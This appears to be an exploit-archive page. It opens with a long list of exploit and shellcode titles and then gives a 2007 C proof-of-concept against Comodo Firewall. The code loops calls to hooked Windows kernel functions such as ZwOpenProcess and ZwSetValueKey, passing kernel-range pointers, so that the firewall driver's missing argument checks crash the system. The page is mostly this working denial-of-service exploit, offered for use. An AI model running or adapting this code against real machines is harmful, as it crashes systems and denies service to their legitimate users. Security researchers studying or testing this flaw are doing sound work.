
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
159 lines
No EOL
4.4 KiB
C
159 lines
No EOL
4.4 KiB
C
// source: https://www.securityfocus.com/bid/22357/info
|
|
|
|
Comodo Firewall is prone to multiple denial-of-service vulnerabilities because it fails to adequately validate user supplied data.
|
|
|
|
Exploiting these issues may permit attackers to cause system crashes and deny service to legitimate users. Presumaby, attackers may also be able to execute arbitrary code, but this has not been confirmed.
|
|
|
|
Comodo Firewall Pro 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected.
|
|
|
|
/*
|
|
|
|
Testing program for Multiple insufficient argument validation of hooked
|
|
SSDT function (BTP00000P005CF)
|
|
|
|
|
|
Usage:
|
|
prog FUNCNAME
|
|
FUNCNAME - name of function to be checked
|
|
|
|
Description:
|
|
This program calls given function with parameters that crash the
|
|
system. This happens because of
|
|
insufficient validation of function arguments in the driver of the
|
|
firewall.
|
|
|
|
Test:
|
|
Running the testing program with the name of a function from the list
|
|
of affected functions.
|
|
|
|
*/
|
|
|
|
#undef __STRICT_ANSI__
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <windows.h>
|
|
#include <ddk/ntapi.h>
|
|
#include <ddk/ntifs.h>
|
|
|
|
void about(void)
|
|
{
|
|
printf("Testing program for Multiple insufficient argument validation
|
|
of hooked SSDT function (BTP00000P005CF)\n");
|
|
printf("Windows Personal Firewall analysis project\n");
|
|
printf("Copyright 2007 by Matousec - Transparent security\n");
|
|
printf("http://www.matousec.com/""\n\n");
|
|
return;
|
|
}
|
|
|
|
void usage(void)
|
|
{
|
|
printf("Usage: test FUNCNAME\n"
|
|
" FUNCNAME - name of function to be checked\n");
|
|
return;
|
|
}
|
|
|
|
void print_last_error(void)
|
|
{
|
|
LPTSTR buf;
|
|
DWORD code=GetLastError();
|
|
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
|
|
FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
|
|
{
|
|
fprintf(stderr,"Error code: %ld\n",code);
|
|
fprintf(stderr,"Error message: %s",buf);
|
|
LocalFree(buf);
|
|
} else fprintf(stderr,"Unable to format error message for code
|
|
%ld.\n",code);
|
|
return;
|
|
}
|
|
|
|
|
|
int main(int argc,char **argv)
|
|
{
|
|
about();
|
|
|
|
if (argc!=2)
|
|
{
|
|
usage();
|
|
return 1;
|
|
}
|
|
|
|
if (!stricmp(argv[1],"NtConnectPort") ||
|
|
!stricmp(argv[1],"ZwConnectPort"))
|
|
{
|
|
HANDLE handle;
|
|
UNICODE_STRING us={0x1000,0x1000,NULL};
|
|
SECURITY_QUALITY_OF_SERVICE sqos;
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
us.Buffer=(PVOID)(i+0x80000000);
|
|
ZwConnectPort(&handle,&us,&sqos,NULL,NULL,NULL,NULL,NULL);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtCreatePort") ||
|
|
!stricmp(argv[1],"ZwCreatePort"))
|
|
{
|
|
HANDLE handle;
|
|
OBJECT_ATTRIBUTES oa;
|
|
UNICODE_STRING us={0x1000,0x1000,NULL};
|
|
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
us.Buffer=(PVOID)(i+0x80000000);
|
|
ZwCreatePort(&handle,&oa,0,0,0);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtCreateSection") ||
|
|
!stricmp(argv[1],"ZwCreateSection"))
|
|
{
|
|
HANDLE handle;
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
|
|
ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtOpenProcess") ||
|
|
!stricmp(argv[1],"ZwOpenProcess"))
|
|
{
|
|
HANDLE handle;
|
|
OBJECT_ATTRIBUTES oa;
|
|
UNICODE_STRING us={0x1000,0x1000,NULL};
|
|
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
PCLIENT_ID clid=(PVOID)(i+0x80000000);
|
|
ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtOpenSection") ||
|
|
!stricmp(argv[1],"ZwOpenSection"))
|
|
{
|
|
HANDLE handle;
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
|
|
ZwOpenSection(&handle,SECTION_ALL_ACCESS,oa);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtOpenThread") ||
|
|
!stricmp(argv[1],"ZwOpenThread"))
|
|
{
|
|
HANDLE handle;
|
|
OBJECT_ATTRIBUTES oa;
|
|
UNICODE_STRING us={0x1000,0x1000,NULL};
|
|
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
PCLIENT_ID clid=(PVOID)(i+0x80000000);
|
|
ZwOpenThread(&handle,THREAD_ALL_ACCESS,&oa,clid);
|
|
}
|
|
} else if (!stricmp(argv[1],"NtSetValueKey") ||
|
|
!stricmp(argv[1],"ZwSetValueKey"))
|
|
{
|
|
for (int i=0;i>=0;i++)
|
|
{
|
|
PUNICODE_STRING us=(PVOID)(i+0x80000000);
|
|
ZwSetValueKey(NULL,us,0,REG_NONE,NULL,0);
|
|
}
|
|
} else printf("\nI do not know how to exploit the vulnerability using
|
|
this function.\n");
|
|
|
|
printf("\nTEST FAILED!\n");
|
|
return 1;
|
|
} |